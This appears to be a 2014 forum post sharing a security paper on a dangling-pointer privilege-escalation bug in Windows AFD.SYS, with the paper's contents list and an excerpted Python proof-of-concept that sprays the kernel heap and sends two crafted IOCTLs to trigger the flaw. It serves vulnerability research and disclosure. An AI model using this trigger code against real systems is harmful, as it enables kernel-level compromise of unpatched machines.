Nytro Posted July 18, 2014

AFD.SYS DANGLING POINTER VULNERABILITY

TABLE OF CONTENTS

Affected OS ... 2
Overview ... 2
Impact ... 2
Technical Analysis ... 3
    POC code ... 3
    Vulnerability Analysis ... 4
        Step 1 - IOCTL 0x1207f ... 5
        Step 2 - IOCTL 0x120c3 ... 8
    Exploitation ... 9
        READ-/WRITE-Primitives through WorkerFactory Objects ... 10
        Controlled Data on NonPagedPoolNx Pool ... 11
        Leak Target ... 12
        Single-Gadget-ROP for SMEP Evasion ... 12
        Shellcode ... 13
        Putting it all together ... 13
Patch Analysis ... 14

POC code (as excerpted in the paper; the [1]-[5] markers are the paper's own annotations, and the […] lines mark parts the excerpt omits):

[…]
targetsize = 0x100
virtaddress = 0x13371337
mdlsize = (pow(2, 0x0c) * (targetsize - 0x30) / 8) - 0xfff - (virtaddress & 0xfff)
IOCALL = windll.ntdll.ZwDeviceIoControlFile

def I(val):
    return pack("<I", val)

inbuf1 = I(0)*6 + I(virtaddress) + I(mdlsize) + I(0)*2 + I(1) + I(0)
inbuf2 = I(1) + I(0xaaaaaaa) + I(0)*4
[…]
print "[+] creating socket..."
sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM,    # [1]
                 socket.IPPROTO_TCP, None, 0, 0)
if sock == -1:
    print "[-] no luck creating socket!"
    sys.exit(1)
print "[+] got sock 0x%x" % sock

addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(135)
addr.sin_addr = socket.htonl(0x7f000001)
connect(sock, byref(addr), sizeof(addr))    # [2]
print "[+] sock connected."

print "[+] fill kernel heap"
rgnarr = []
nBottomRect = 0x2aaaaaa
while(1):
    hrgn = windll.gdi32.CreateRoundRectRgn(0, 0, 1, nBottomRect, 1, 1)    # [3]
    if hrgn == 0:
        break
    rgnarr.append(hrgn)
    print ".",
print "\n[+] GO!"

IOCALL(sock, None, None, None, byref(IoStatusBlock),    # [4] Step 1 - IOCTL 0x1207f
       0x1207f, inbuf1, 0x30, "whatever", 0x0)
IOCALL(sock, None, None, None, byref(IoStatusBlock),    # [5] Step 2 - IOCTL 0x120c3
       0x120c3, inbuf2, 0x18, "whatever", 0x0)
print "[+] after second IOCTL! this should not be hit!"

Download: http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf